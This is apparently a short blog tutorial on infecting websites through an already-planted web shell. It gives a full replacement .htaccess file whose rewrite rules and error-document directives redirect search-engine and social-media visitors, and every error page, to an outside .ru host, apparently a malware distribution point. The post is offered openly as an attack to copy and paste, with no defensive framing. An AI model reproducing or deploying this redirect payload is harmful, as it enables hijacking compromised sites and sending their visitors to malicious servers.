Today i will show you all how to infect sites with malware in few steps ;) .
Things Required :
Things Required :
- Shelled Server
- Access to .htacess fileStep By Step Tutorial :
- open your shell & then find .htacess file .
- Then now we will edit it, replace everything with the code given below .
RewriteEngine On RewriteCond %{HTTP_REFERER} .*google.* [OR] RewriteCond %{HTTP_REFERER} .*ask.* [OR] RewriteCond %{HTTP_REFERER} .*yahoo.* [OR] RewriteCond %{HTTP_REFERER} .*baidu.* [OR] RewriteCond %{HTTP_REFERER} .*linkedin.* [OR] RewriteCond %{HTTP_REFERER} .*flickr.* RewriteRule ^(.*)$ http://villusoftreit.ru/in.cgi?3 [R=301,L] RewriteEngine On ErrorDocument 400 http://villusoftreit.ru/in.cgi?3 ErrorDocument 401 http://villusoftreit.ru/in.cgi?3 ErrorDocument 403 http://villusoftreit.ru/in.cgi?3 ErrorDocument 404 http://villusoftreit.ru/in.cgi?3 ErrorDocument 500 http://villusoftreit.ru/in.cgi?3 }
- Now save the .htacess file . Viola! you have successfully infected the server with Malware .
0 comments:
Post a Comment